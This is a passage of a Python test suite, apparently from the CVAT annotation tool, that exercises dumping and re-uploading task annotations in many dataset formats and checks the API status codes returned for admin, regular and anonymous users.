self.assertEqual(response.status_code, edata['accept code'])
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['create code'])
data = {
"format": dump_format_name,
"action": "download",
}
response = self._get_request_with_data(url, data, user)
self.assertEqual(response.status_code, edata['code'])
if response.status_code == status.HTTP_200_OK:
content = BytesIO(b"".join(response.streaming_content))
with open(file_zip_name, "wb") as f:
f.write(content.getvalue())
self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
# Upload annotations with objects type is shape
for upload_format in upload_formats:
upload_format_name = upload_format.DISPLAY_NAME
if upload_format_name == "CVAT 1.1":
file_zip_name = osp.join(test_dir, f'{test_name}_admin_CVAT for images 1.1.zip')
else:
file_zip_name = osp.join(test_dir, f'{test_name}_admin_{upload_format_name}.zip')
if not upload_format.ENABLED or not osp.exists(file_zip_name):
continue
with self.subTest(format=upload_format_name):
if upload_format_name in [
"MOTS PNG 1.0", # issue #2925 and changed points values
]:
self.skipTest("Format is fail")
if osp.exists(file_zip_name):
for user, edata in list(expected.items()):
# remove all annotations from task (create new task without annotation)
images = self._generate_task_images(3)
if upload_format_name == "Market-1501 1.0":
task = self._create_task(tasks["market1501"], images)
elif upload_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
task = self._create_task(tasks["icdar_localization_and_recognition"], images)
elif upload_format_name == "ICDAR Segmentation 1.0":
task = self._create_task(tasks["icdar_segmentation"], images)
else:
task = self._create_task(tasks["main"], images)
task_id = task["id"]
url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
with open(file_zip_name, 'rb') as binary_file:
response = self._put_request_with_data(url, {"annotation_file": binary_file}, user)
self.assertEqual(response.status_code, edata['accept code'])
response = self._put_request_with_data(url, {}, user)
self.assertEqual(response.status_code, edata['create code'])
def test_api_v1_dump_annotations_with_objects_type_is_track(self):
    """Export track annotations in every enabled dump format, then re-import
    the produced archives, checking the HTTP status codes expected for an
    admin, a regular user and an anonymous request.
    """
    test_name = self._testMethodName
    dump_formats = dm.views.get_export_formats()
    upload_formats = dm.views.get_import_formats()
    # Per-user expectations: download code, first/second dump request codes,
    # whether the archive should appear on disk, and whether the upload
    # phase should succeed in loading it.
    expected = {
        self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
            'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True, 'annotation_loaded': True},
        self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
            'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True, 'annotation_loaded': True},
        None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
            'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False, 'annotation_loaded': False},
    }
    with TestDir() as test_dir:
        # Dump annotations with objects type is track
        for dump_format in dump_formats:
            if not dump_format.ENABLED:
                continue
            dump_format_name = dump_format.DISPLAY_NAME
            with self.subTest(format=dump_format_name):
                # create task with annotations; some formats need a dedicated label schema
                video = self._generate_task_videos(1)
                if dump_format_name == "Market-1501 1.0":
                    task = self._create_task(tasks["market1501"], video)
                elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
                    task = self._create_task(tasks["icdar_localization_and_recognition"], video)
                elif dump_format_name == "ICDAR Segmentation 1.0":
                    task = self._create_task(tasks["icdar_segmentation"], video)
                else:
                    task = self._create_task(tasks["main"], video)
                task_id = task["id"]
                # These formats get deterministic "default" annotations; the
                # rest get randomly generated ones.
                if dump_format_name in [
                    "MOT 1.1", "MOTS PNG 1.0", \
                    "PASCAL VOC 1.1", "Segmentation mask 1.1", \
                    "TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
                    "WiderFace 1.0", "VGGFace2 1.0", \
                ]:
                    self._create_annotations(task, dump_format_name, "default")
                else:
                    self._create_annotations(task, dump_format_name, "random")
                # dump annotations
                url = self._generate_url_dump_tasks_annotations(task_id)
                for user, edata in list(expected.items()):
                    user_name = edata['name']
                    file_zip_name = osp.join(test_dir, f'{test_name}_{user_name}_{dump_format_name}.zip')
                    data = {
                        "format": dump_format_name,
                    }
                    # First request only schedules the export (202 expected);
                    # the second one reports the result as created (201).
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata['accept code'])
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata['create code'])
                    data = {
                        "format": dump_format_name,
                        "action": "download",
                    }
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata['code'])
                    if response.status_code == status.HTTP_200_OK:
                        # Persist the streamed archive so the upload phase below can reuse it.
                        content = BytesIO(b"".join(response.streaming_content))
                        with open(file_zip_name, "wb") as f:
                            f.write(content.getvalue())
                    self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
        # Upload annotations with objects type is track
        for upload_format in upload_formats:
            upload_format_name = upload_format.DISPLAY_NAME
            # The "CVAT 1.1" import format consumes the archive that was
            # dumped above under the "CVAT for video 1.1" name.
            if upload_format_name == "CVAT 1.1":
                file_zip_name = osp.join(test_dir, f'{test_name}_admin_CVAT for video 1.1.zip')
            else:
                file_zip_name = osp.join(test_dir, f'{test_name}_admin_{upload_format_name}.zip')
            if not upload_format.ENABLED or not osp.exists(file_zip_name):
                continue
            with self.subTest(format=upload_format_name):
                if upload_format_name in [
                    "MOTS PNG 1.0", # issue #2925 and changed points values
                ]:
                    self.skipTest("Format is fail")
                if osp.exists(file_zip_name):
                    for user, edata in list(expected.items()):
                        # remove all annotations from task (create new task without annotation)
                        video = self._generate_task_videos(1)
                        if upload_format_name == "Market-1501 1.0":
                            task = self._create_task(tasks["market1501"], video)
                        elif upload_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
                            task = self._create_task(tasks["icdar_localization_and_recognition"], video)
                        elif upload_format_name == "ICDAR Segmentation 1.0":
                            task = self._create_task(tasks["icdar_segmentation"], video)
                        else:
                            task = self._create_task(tasks["main"], video)
                        task_id = task["id"]
                        url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
                        # First PUT carries the file (202 accepted); the second
                        # empty PUT finalizes the import (201 created).
                        with open(file_zip_name, 'rb') as binary_file:
                            response = self._put_request_with_data(url, {"annotation_file": binary_file}, user)
                            self.assertEqual(response.status_code, edata['accept code'])
                            response = self._put_request_with_data(url, {}, user)
                            self.assertEqual(response.status_code, edata['create code'])
def test_api_v1_dump_tag_annotations(self):
    """Dump tag annotations in the "CVAT for images 1.1" format and check
    status codes per user role, with tags created either in every job of the
    task ('all') or only in the first one ('first').
    """
    dump_format_name = "CVAT for images 1.1"
    data = {
        "format": dump_format_name,
        "action": "download",
    }
    # BUG FIX: was ['all' 'first'] — implicit string-literal concatenation
    # produced the single case 'allfirst', so the "annotate every job"
    # branch was never exercised.
    test_cases = ['all', 'first']
    expected = {
        self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
            'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
        self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
            'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
        None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
            'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False},
    }
    for test_case in test_cases:
        images = self._generate_task_images(10)
        task = self._create_task(tasks["change overlap and segment size"], images)
        task_id = task["id"]
        jobs = self._get_jobs(task_id)
        if test_case == "all":
            for job in jobs:
                self._create_annotations_in_job(task, job["id"], "CVAT for images 1.1 tag", "default")
        else:
            self._create_annotations_in_job(task, jobs[0]["id"], "CVAT for images 1.1 tag", "default")
        for user, edata in list(expected.items()):
            with self.subTest(format=f"{edata['name']}"):
                with TestDir() as test_dir:
                    user_name = edata['name']
                    url = self._generate_url_dump_tasks_annotations(task_id)
                    file_zip_name = osp.join(test_dir, f'{user_name}.zip')
                    data = {
                        "format": dump_format_name,
                    }
                    # First request schedules the export (202), the second one
                    # reports the result as created (201).
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata['accept code'])
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata['create code'])
                    data = {
                        "format": dump_format_name,
                        "action": "download",
                    }
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata['code'])
                    if response.status_code == status.HTTP_200_OK:
                        # Persist the streamed archive to disk for the existence check.
                        content = BytesIO(b"".join(response.streaming_content))
                        with open(file_zip_name, "wb") as f:
                            f.write(content.getvalue())
                    self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
def test_api_v1_dump_and_upload_annotations_with_objects_are_different_images(self):
    """Round-trip a task holding mixed object types on images: dump, wipe,
    re-upload, and verify the annotations come back as 2 shapes / 0 tracks.
    Covers both task-level and job-level annotation creation/upload.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for images 1.1"
    upload_types = ["task", "job"]
    images = self._generate_task_images(2)
    task = self._create_task(tasks["main"], images)
    task_id = task["id"]
    for upload_type in upload_types:
        # BUG FIX: was subTest(format=type), which passed the builtin `type`
        # instead of the loop variable and made the subtest labels useless.
        with self.subTest(format=upload_type):
            with TestDir() as test_dir:
                if upload_type == "task":
                    self._create_annotations(task, "CVAT for images 1.1 different types", "random")
                else:
                    jobs = self._get_jobs(task_id)
                    job_id = jobs[0]["id"]
                    self._create_annotations_in_job(task, job_id, "CVAT for images 1.1 different types", "random")
                url = self._generate_url_dump_tasks_annotations(task_id)
                file_zip_name = osp.join(test_dir, f'{test_name}_{upload_type}.zip')
                data = {
                    "format": dump_format_name,
                    "action": "download",
                }
                self._download_file(url, data, self.admin, file_zip_name)
                self.assertEqual(osp.exists(file_zip_name), True)
                # Wipe the originals so the upload is the only source of annotations.
                self._remove_annotations(url, self.admin)
                if upload_type == "task":
                    url_upload = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
                else:
                    jobs = self._get_jobs(task_id)
                    url_upload = self._generate_url_upload_job_annotations(jobs[0]["id"], "CVAT 1.1")
                with open(file_zip_name, 'rb') as binary_file:
                    self._upload_file(url_upload, binary_file, self.admin)
                # Image annotations round-trip as shapes only.
                response = self._get_request(f"/api/v1/tasks/{task_id}/annotations", self.admin)
                self.assertEqual(len(response.data["shapes"]), 2)
                self.assertEqual(len(response.data["tracks"]), 0)
def test_api_v1_dump_and_upload_annotations_with_objects_are_different_video(self):
    """Round-trip a video task holding mixed object types: dump, wipe,
    re-upload, and verify the annotations come back as 0 shapes / 2 tracks.
    Covers both task-level and job-level annotation creation/upload.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for video 1.1"
    upload_types = ["task", "job"]
    video = self._generate_task_videos(1)
    task = self._create_task(tasks["main"], video)
    task_id = task["id"]
    for upload_type in upload_types:
        # BUG FIX: was subTest(format=type), which passed the builtin `type`
        # instead of the loop variable and made the subtest labels useless.
        with self.subTest(format=upload_type):
            with TestDir() as test_dir:
                # NOTE(review): the annotation template name says "images"
                # even though this is the video test — presumably the same
                # mixed-types template is reused for both; confirm.
                if upload_type == "task":
                    self._create_annotations(task, "CVAT for images 1.1 different types", "random")
                else:
                    jobs = self._get_jobs(task_id)
                    job_id = jobs[0]["id"]
                    self._create_annotations_in_job(task, job_id, "CVAT for images 1.1 different types", "random")
                url = self._generate_url_dump_tasks_annotations(task_id)
                file_zip_name = osp.join(test_dir, f'{test_name}_{upload_type}.zip')
                data = {
                    "format": dump_format_name,
                    "action": "download",
                }
                self._download_file(url, data, self.admin, file_zip_name)
                self.assertEqual(osp.exists(file_zip_name), True)
                # Wipe the originals so the upload is the only source of annotations.
                self._remove_annotations(url, self.admin)
                if upload_type == "task":
                    url_upload = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
                else:
                    jobs = self._get_jobs(task_id)
                    url_upload = self._generate_url_upload_job_annotations(jobs[0]["id"], "CVAT 1.1")
                with open(file_zip_name, 'rb') as binary_file:
                    self._upload_file(url_upload, binary_file, self.admin)
                # (Removed a duplicate osp.exists() assertion here: the file's
                # existence was already verified right after the download.)
                # Video annotations round-trip as tracks only.
                response = self._get_request(f"/api/v1/tasks/{task_id}/annotations", self.admin)
                self.assertEqual(len(response.data["shapes"]), 0)
                self.assertEqual(len(response.data["tracks"]), 2)
def test_api_v1_dump_and_upload_with_objects_type_is_track_and_outside_property(self):
    """Round-trip a video task whose track carries an "outside" slice:
    dump the annotations to a zip archive and upload the same archive back.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for video 1.1"
    task = self._create_task(tasks["main"], self._generate_task_videos(1))
    self._create_annotations(task, "CVAT for video 1.1 slice track", "random")
    task_id = task["id"]
    download_params = {
        "format": dump_format_name,
        "action": "download",
    }
    with TestDir() as test_dir:
        dump_url = self._generate_url_dump_tasks_annotations(task_id)
        archive_path = osp.join(test_dir, f'{test_name}.zip')
        self._download_file(dump_url, download_params, self.admin, archive_path)
        self.assertTrue(osp.exists(archive_path))
        upload_url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
        with open(archive_path, 'rb') as archive:
            self._upload_file(upload_url, archive, self.admin)
def test_api_v1_dump_and_upload_with_objects_type_is_track_and_keyframe_property(self):
    """Round-trip a video task whose track has explicit keyframes on a
    slice: dump the annotations and upload the produced archive back.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for video 1.1"
    task = self._create_task(tasks["main"], self._generate_task_videos(1))
    self._create_annotations(task, "CVAT for video 1.1 slice track keyframe", "random")
    task_id = task["id"]
    download_params = {
        "format": dump_format_name,
        "action": "download",
    }
    with TestDir() as test_dir:
        dump_url = self._generate_url_dump_tasks_annotations(task_id)
        archive_path = osp.join(test_dir, f'{test_name}.zip')
        self._download_file(dump_url, download_params, self.admin, archive_path)
        self.assertTrue(osp.exists(archive_path))
        upload_url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
        with open(archive_path, 'rb') as archive:
            self._upload_file(upload_url, archive, self.admin)
def test_api_v1_dump_upload_annotations_from_several_jobs(self):
    """Dump annotations created in every job of a multi-job task into one
    archive, wipe the task, and re-upload the merged archive.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for images 1.1"
    task = self._create_task(tasks["change overlap and segment size"], self._generate_task_images(10))
    task_id = task["id"]
    for job in self._get_jobs(task_id):
        self._create_annotations_in_job(task, job["id"], "CVAT for images 1.1 merge", "random")
    with TestDir() as test_dir:
        dump_url = self._generate_url_dump_tasks_annotations(task_id)
        archive_path = osp.join(test_dir, f'{test_name}.zip')
        request_data = {
            "format": dump_format_name,
            "action": "download",
        }
        self._download_file(dump_url, request_data, self.admin, archive_path)
        self.assertTrue(osp.exists(archive_path))
        # Drop the originals before importing them back.
        self._remove_annotations(dump_url, self.admin)
        upload_url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
        with open(archive_path, 'rb') as archive:
            self._upload_file(upload_url, archive, self.admin)
def test_api_v1_dump_annotations_with_objects_type_is_shape_from_several_jobs(self):
    """Dump shape annotations from a multi-job task — with shapes placed
    either in every job or only in the first — then re-upload the dump.
    """
    test_name = self._testMethodName
    dump_format_name = "CVAT for images 1.1"
    task = self._create_task(tasks["change overlap and segment size"], self._generate_task_images(10))
    task_id = task["id"]
    for scope in ('all', 'first'):
        with TestDir() as test_dir:
            jobs = self._get_jobs(task_id)
            annotated_jobs = jobs if scope == "all" else jobs[:1]
            for job in annotated_jobs:
                self._create_annotations_in_job(task, job["id"], dump_format_name, "default")
            dump_url = self._generate_url_dump_tasks_annotations(task_id)
            archive_path = osp.join(test_dir, f'{test_name}.zip')
            request_data = {
                "format": dump_format_name,
                "action": "download",
            }
            self._download_file(dump_url, request_data, self.admin, archive_path)
            self.assertTrue(osp.exists(archive_path))
            # remove annotations before importing them back
            self._remove_annotations(dump_url, self.admin)
            upload_url = self._generate_url_upload_tasks_annotations(task_id, "CVAT 1.1")
            with open(archive_path, 'rb') as archive:
                self._upload_file(upload_url, archive, self.admin)
def test_api_v1_export_dataset(self):
    """Export a whole dataset (images plus annotations) in the
    "CVAT for images 1.1" format and verify per-user-role status codes and
    the presence of the downloaded archive.
    """
    test_name = self._testMethodName
    dump_formats = dm.views.get_export_formats()
    expected = {
        self.admin: {'name': 'admin', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
            'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
        self.user: {'name': 'user', 'code': status.HTTP_200_OK, 'create code': status.HTTP_201_CREATED,
            'accept code': status.HTTP_202_ACCEPTED, 'file_exists': True},
        None: {'name': 'none', 'code': status.HTTP_401_UNAUTHORIZED, 'create code': status.HTTP_401_UNAUTHORIZED,
            'accept code': status.HTTP_401_UNAUTHORIZED, 'file_exists': False},
    }
    with TestDir() as test_dir:
        # Only the "CVAT for images 1.1" export format is exercised here.
        # (FIX: the old comment claimed this dumped shape annotations,
        # copied from a different test.)
        for dump_format in dump_formats:
            if not dump_format.ENABLED or dump_format.DISPLAY_NAME != "CVAT for images 1.1":
                continue
            dump_format_name = dump_format.DISPLAY_NAME
            with self.subTest(format=dump_format_name):
                images = self._generate_task_images(3)
                # create task with annotations
                if dump_format_name == "Market-1501 1.0":
                    task = self._create_task(tasks["market1501"], images)
                elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
                    task = self._create_task(tasks["icdar_localization_and_recognition"], images)
                elif dump_format_name == "ICDAR Segmentation 1.0":
                    task = self._create_task(tasks["icdar_segmentation"], images)
                else:
                    task = self._create_task(tasks["main"], images)
                task_id = task["id"]
                # dump the dataset
                url = self._generate_url_dump_dataset(task_id)
                for user, edata in list(expected.items()):
                    user_name = edata['name']
                    file_zip_name = osp.join(test_dir, f'{test_name}_{user_name}_{dump_format_name}.zip')
                    data = {
                        "format": dump_format_name,
                    }
                    # First request schedules the export (202), the second one
                    # reports the result as created (201).
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata["accept code"])
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata["create code"])
                    data = {
                        "format": dump_format_name,
                        "action": "download",
                    }
                    response = self._get_request_with_data(url, data, user)
                    self.assertEqual(response.status_code, edata["code"])
                    if response.status_code == status.HTTP_200_OK:
                        content = BytesIO(b"".join(response.streaming_content))
                        with open(file_zip_name, "wb") as f:
                            f.write(content.getvalue())
                    # FIX: removed a duplicated status-code assertion that
                    # re-checked edata['code'] after the download branch.
                    self.assertEqual(osp.exists(file_zip_name), edata['file_exists'])
def test_api_v1_dump_empty_frames(self):
    """Dump tasks containing only empty annotations in every enabled export
    format, then re-import each produced archive as admin and verify the
    upload completes (202 accepted, then 201 created with an empty body).
    """
    dump_formats = dm.views.get_export_formats()
    upload_formats = dm.views.get_import_formats()
    with TestDir() as test_dir:
        for dump_format in dump_formats:
            if not dump_format.ENABLED:
                continue
            dump_format_name = dump_format.DISPLAY_NAME
            with self.subTest(format=dump_format_name):
                # Fresh three-image task; "empty annotation" creates no real objects.
                images = self._generate_task_images(3)
                task = self._create_task(tasks["no attributes"], images)
                task_id = task["id"]
                self._create_annotations(task, "empty annotation", "default")
                url = self._generate_url_dump_tasks_annotations(task_id)
                file_zip_name = osp.join(test_dir, f'empty_{dump_format_name}.zip')
                data = {
                    "format": dump_format_name,
                    "action": "download",
                }
                self._download_file(url, data, self.admin, file_zip_name)
                self.assertEqual(osp.exists(file_zip_name), True)
        for upload_format in upload_formats:
            upload_format_name = upload_format.DISPLAY_NAME
            # The "CVAT 1.1" import format consumes the archive dumped above
            # under the "CVAT for images 1.1" name.
            if upload_format_name == "CVAT 1.1":
                file_zip_name = osp.join(test_dir, 'empty_CVAT for images 1.1.zip')
            else:
                file_zip_name = osp.join(test_dir, f'empty_{upload_format_name}.zip')
            if not osp.exists(file_zip_name) or not upload_format.ENABLED:
                continue
            with self.subTest(format=upload_format_name):
                if upload_format_name in [
                    "MOTS PNG 1.0", # issue #2925 and changed points values
                ]:
                    self.skipTest("Format is fail")
                # Import into a brand-new empty task.
                images = self._generate_task_images(3)
                task = self._create_task(tasks["no attributes"], images)
                task_id = task["id"]
                url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
                # First PUT uploads the file (202); the second empty PUT
                # finalizes the import (201) and must return no data.
                with open(file_zip_name, 'rb') as binary_file:
                    response = self._put_request_with_data(url, {"annotation_file": binary_file}, self.admin)
                    self.assertEqual(response.status_code, status.HTTP_202_ACCEPTED)
                    response = self._put_request_with_data(url, {}, self.admin)
                    self.assertEqual(response.status_code, status.HTTP_201_CREATED)
                    self.assertIsNone(response.data)
def test_api_v1_rewriting_annotations(self):
    """Verify that uploading a previously dumped archive rewrites (replaces)
    the task's current annotations: the shape count after the upload must
    equal the count captured before the dump, even though different
    annotations were created in between.
    """
    test_name = self._testMethodName
    dump_formats = dm.views.get_export_formats()
    with TestDir() as test_dir:
        for dump_format in dump_formats:
            if not dump_format.ENABLED:
                continue
            dump_format_name = dump_format.DISPLAY_NAME
            with self.subTest(format=dump_format_name):
                if dump_format_name in [
                    "MOTS PNG 1.0", # issue #2925 and changed points values
                    "Datumaro 1.0" # Datumaro 1.0 is not in the list of import format
                ]:
                    self.skipTest("Format is fail")
                # Some formats need a dedicated label schema for the task.
                images = self._generate_task_images(3)
                if dump_format_name == "Market-1501 1.0":
                    task = self._create_task(tasks["market1501"], images)
                elif dump_format_name in ["ICDAR Localization 1.0", "ICDAR Recognition 1.0"]:
                    task = self._create_task(tasks["icdar_localization_and_recognition"], images)
                elif dump_format_name == "ICDAR Segmentation 1.0":
                    task = self._create_task(tasks["icdar_segmentation"], images)
                else:
                    task = self._create_task(tasks["main"], images)
                task_id = task["id"]
                # Deterministic "default" annotations for the listed formats,
                # random ones otherwise.
                if dump_format_name in [
                    "MOT 1.1", "MOTS PNG 1.0", \
                    "PASCAL VOC 1.1", "Segmentation mask 1.1", \
                    "TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
                    "WiderFace 1.0", "VGGFace2 1.0", \
                ]:
                    self._create_annotations(task, dump_format_name, "default")
                else:
                    self._create_annotations(task, dump_format_name, "random")
                # Snapshot the DB state before the dump for the final comparison.
                task_ann = TaskAnnotation(task_id)
                task_ann.init_from_db()
                task_ann_prev_data = task_ann.data
                url = self._generate_url_dump_tasks_annotations(task_id)
                file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
                data = {
                    "format": dump_format_name,
                    "action": "download",
                }
                self._download_file(url, data, self.admin, file_zip_name)
                self.assertEqual(osp.exists(file_zip_name), True)
                # Replace the annotations with different ones so the upload
                # must rewrite — not merge — them.
                self._remove_annotations(url, self.admin)
                self._create_annotations(task, "CVAT for images 1.1 many jobs", "default")
                # Both CVAT dump flavors are imported under the single "CVAT 1.1" name.
                if dump_format_name == "CVAT for images 1.1" or dump_format_name == "CVAT for video 1.1":
                    dump_format_name = "CVAT 1.1"
                url = self._generate_url_upload_tasks_annotations(task_id, dump_format_name)
                with open(file_zip_name, 'rb') as binary_file:
                    self._upload_file(url, binary_file, self.admin)
                # After the upload the shape count must match the pre-dump snapshot.
                task_ann = TaskAnnotation(task_id)
                task_ann.init_from_db()
                task_ann_data = task_ann.data
                self.assertEqual(len(task_ann_data["shapes"]), len(task_ann_prev_data["shapes"]))
def test_api_v1_tasks_annotations_dump_and_upload_many_jobs_with_datumaro(self):
    """Round-trip a many-job task through dump and upload for both CVAT dump
    flavors, with and without images included, and compare the task data
    before and after via a Datumaro dataset comparison.
    """
    test_name = self._testMethodName
    upload_format_name = "CVAT 1.1"
    include_images_params = (False, True)
    dump_format_names = ("CVAT for images 1.1", "CVAT for video 1.1")
    # Exercise every (dump format, include_images) combination.
    for dump_format_name, include_images in itertools.product(dump_format_names, include_images_params):
        with self.subTest(f"{dump_format_name}_include_images_{include_images}"):
            # create task with annotations
            images = self._generate_task_images(13)
            task = self._create_task(tasks["many jobs"], images)
            self._create_annotations(task, f'{dump_format_name} many jobs', "default")
            task_id = task["id"]
            # Snapshot before the round trip for the final dataset comparison.
            data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
            # dump annotations
            url = self._generate_url_dump_tasks_annotations(task_id)
            with TestDir() as test_dir:
                file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
                data = {
                    "format": dump_format_name,
                    "action": "download",
                }
                self._download_file(url, data, self.admin, file_zip_name)
                self._check_downloaded_file(file_zip_name)
                # remove annotations
                self._remove_annotations(url, self.admin)
                # upload annotations
                url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
                with open(file_zip_name, 'rb') as binary_file:
                    self._upload_file(url, binary_file, self.admin)
                # equals annotations
                data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
                compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)
def test_api_v1_tasks_annotations_dump_and_upload_with_datumaro(self):
    """For every enabled export format: dump a task's annotations, wipe
    them, upload the dump back, and verify via a Datumaro dataset
    comparison that the task data is unchanged — both with and without
    images included.
    """
    test_name = self._testMethodName
    # get formats
    dump_formats = dm.views.get_export_formats()
    include_images_params = (False, True)
    for dump_format, include_images in itertools.product(dump_formats, include_images_params):
        if dump_format.ENABLED:
            dump_format_name = dump_format.DISPLAY_NAME
            with self.subTest(dump_format_name):
                # Formats with known round-trip issues are skipped.
                if dump_format_name in [
                    "MOT 1.1",
                    "Datumaro 1.0", # not uploaded
                    "CamVid 1.0", # issue #2840 and changed points values
                    "MOTS PNG 1.0", # changed points values
                    "Segmentation mask 1.1", # changed points values
                    "ICDAR Segmentation 1.0", # changed points values
                ]:
                    self.skipTest("Format is fail")
                # create task; some formats need a dedicated label schema
                images = self._generate_task_images(3)
                if dump_format_name == "Market-1501 1.0":
                    task = self._create_task(tasks["market1501"], images)
                elif dump_format_name in ["ICDAR Localization 1.0",
                        "ICDAR Recognition 1.0"]:
                    task = self._create_task(tasks["icdar_localization_and_recognition"], images)
                elif dump_format_name == "ICDAR Segmentation 1.0":
                    task = self._create_task(tasks["icdar_segmentation"], images)
                else:
                    task = self._create_task(tasks["main"], images)
                # create annotations (deterministic for the listed formats,
                # random otherwise)
                if dump_format_name in [
                    "MOT 1.1", "MOTS PNG 1.0", \
                    "PASCAL VOC 1.1", "Segmentation mask 1.1", \
                    "TFRecord 1.0", "YOLO 1.1", "ImageNet 1.0", \
                    "WiderFace 1.0", "VGGFace2 1.0", \
                ]:
                    self._create_annotations(task, dump_format_name, "default")
                else:
                    self._create_annotations(task, dump_format_name, "random")
                task_id = task["id"]
                # Snapshot before the round trip for the final comparison.
                data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
                # dump annotations
                url = self._generate_url_dump_tasks_annotations(task_id)
                with TestDir() as test_dir:
                    file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
                    data = {
                        "format": dump_format_name,
                        "action": "download",
                    }
                    self._download_file(url, data, self.admin, file_zip_name)
                    self._check_downloaded_file(file_zip_name)
                    # remove annotations
                    self._remove_annotations(url, self.admin)
                    # upload annotations; both CVAT dump flavors import under "CVAT 1.1"
                    if dump_format_name in ["CVAT for images 1.1", "CVAT for video 1.1"]:
                        upload_format_name = "CVAT 1.1"
                    else:
                        upload_format_name = dump_format_name
                    url = self._generate_url_upload_tasks_annotations(task_id, upload_format_name)
                    with open(file_zip_name, 'rb') as binary_file:
                        self._upload_file(url, binary_file, self.admin)
                    # equals annotations
                    data_from_task_after_upload = self._get_data_from_task(task_id, include_images)
                    compare_datasets(self, data_from_task_before_upload, data_from_task_after_upload)
def test_api_v1_check_duplicated_polygon_points(self):
    """Dump a track polygon and check the exported XML carries exactly the
    points that were created (guards against duplicated points on export).
    """
    test_name = self._testMethodName
    task = self._create_task(tasks["main"], self._generate_task_images(10))
    task_id = task["id"]
    annotation_name = "CVAT for video 1.1 polygon"
    self._create_annotations(task, annotation_name, "default")
    expected_points = annotations[annotation_name]["tracks"][0]["shapes"][0]['points']
    request_data = {
        "format": "CVAT for video 1.1",
        "action": "download",
    }
    with TestDir() as test_dir:
        dump_url = self._generate_url_dump_tasks_annotations(task_id)
        archive_path = osp.join(test_dir, f'{test_name}.zip')
        self._download_file(dump_url, request_data, self.admin, archive_path)
        self._check_downloaded_file(archive_path)
        extract_dir = osp.join(test_dir, f'{test_name}')
        with zipfile.ZipFile(archive_path, 'r') as archive:
            archive.extractall(extract_dir)
        xml_root = ET.parse(osp.join(extract_dir, 'annotations.xml')).getroot()
        # Every exported polygon of track 0 must match the source points.
        for polygon in xml_root.findall("./track[@id='0']/polygon"):
            raw_points = polygon.attrib["points"].replace(",", ";")
            parsed_points = [float(value) for value in raw_points.split(";")]
            self.assertEqual(parsed_points, expected_points)
def test_api_v1_check_widerface_with_all_attributes(self):
    """Round-trip WiderFace annotations with every attribute kind and verify
    the task data is unchanged after the dump + re-upload, both with and
    without images included.
    """
    test_name = self._testMethodName
    dump_format_name = "WiderFace 1.0"
    upload_format_name = "WiderFace 1.0"
    for include_images in (False, True):
        with self.subTest():
            # create task with annotations
            images = self._generate_task_images(3)
            task = self._create_task(tasks["widerface with all attributes"], images)
            self._create_annotations(task, f'{dump_format_name}', "random")
            task_id = task["id"]
            data_from_task_before_upload = self._get_data_from_task(task_id, include_images)
            # dump annotations
            url = self._generate_url_dump_tasks_annotations(task_id)
            data = {
                "format": dump_format_name,
                "action": "download",
            }
            with TestDir() as test_dir:
                file_zip_name = osp.join(test_dir, f'{test_name}_{dump_format_name}.zip')
                self._download_file(url, data, self.admin, file_zip_name)
                self._check_downloaded_file(file_zip_name)
                # remove annotations
                self._remove_annotations(url, self.admin)
                # upload annotations
